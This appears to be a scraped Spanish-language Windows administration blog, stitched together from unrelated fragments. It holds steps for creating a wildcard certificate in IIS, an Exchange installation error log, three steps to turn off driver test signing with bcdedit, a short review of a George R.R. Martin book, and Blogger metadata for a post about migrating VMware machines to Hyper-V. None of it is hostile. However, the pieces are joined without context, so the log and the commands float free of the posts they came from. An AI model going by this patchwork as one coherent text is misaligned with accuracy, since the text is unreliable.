
• Abrimos el Administrador de Internet Information Services (IIS) y en el árbol de la izquierda localizamos el servidor IIS sobre el que queremos realizar la solicitud del certificado. Una vez localizado, hacemos doble clic sobre el icono de Certificados de servidor del panel central de la consola.

• En este segundo paso, debemos hacer clic sobre la opción Crear certificado de dominio… del panel de la derecha y rellenar los datos que nos solicita el asistente. El único campo con el que tenéis que tener especial cuidado es con el campo de“Nombre común que debéis rellenarlo con un texto con el formato “*.dominio.ext” (sin las comillas), fijaros bien, que sino luego el certificado no sirve como wildcard. Una vez completado, tan solo falta hacer clic en el botón Siguiente.

• El tercer paso es seleccionar la entidad certificadora de vuestro dominio que generará el nuevo certificado.

• Por último, una vez generado el nuevo certificado, vamos a comprobar que realmente hemos generado un certificado wildcard. Para comprobarlo tan solo hay que abrir el certificado, y en la pestaña de Detalles, buscar el campo Asunto. Deberemos ver un valor para CN similar al de la imagen que se encuentra a continuación.

[…]

[ERROR] Unexpected Error
[23/03/2010 18:52:29] [2] [ERROR] Service ‘MSExchangeTransport’ failed to start. Error:‘No se puede iniciar el servicio MSExchangeTransport en el equipo ‘.’.’.
[23/03/2010 18:52:29] [2] [ERROR] No se puede iniciar el servicio MSExchangeTransport en el equipo ‘.’.

[…]

1. Ejecutar cmd.exe como Administrador.


2. Escribir bcdedit /set testsigning off.


3. Reiniciar.

En este caso, y de forma muy agradable, el culpable fue el libro Los viajes de Tuf de George R.R. Martin. El libro en realidad es la recopilación de un pequeño conjunto de historias cortas sobre Haviland Tuf, mercader espacial de poca fortuna que se convierte por azares del destino en el poseedor de una nave espacial con un potencial enorme tanto para crear vida como para destruirla. En ese fino hilo se mueve el personaje durante cada uno de los relatos mostrando su particular forma de ver la vida.

Personalmente, una vez terminado el libro, se me quedo una sonrisa cínica entre los labios y la sensación de que ojala hubiera una segunda parte de esta fascinante narración.

Por cierto, si os interesa echarle un vistazo, aquí os dejo al URL a la web de ION{:target="_blank"}

• Hyper-V
• herramientas
• VMware modified_time: ‘2018-03-18T19:25:21.810Z’ blogger_id: tag:blogger.com,1999:blog-2905111926096763453.post-7156186289338569441 blogger_orig_url: http://igalvit.blogspot.com/2012/10/migrate-virtual-machines-from-vmware.html

Una herramienta que permite convertir máquinas virtuales desde VMware a Hyper-V

Enlace al artículo: http://blogs.technet.com/b/virtualization/archive/2012/09/18/migrate-virtual-machines-from-a-vmware-environment-to-hyper-v-in-windows-server-2012-using-a-free-simple-standalone-tool.aspx

Puedes contactarme en correo@igalvan.es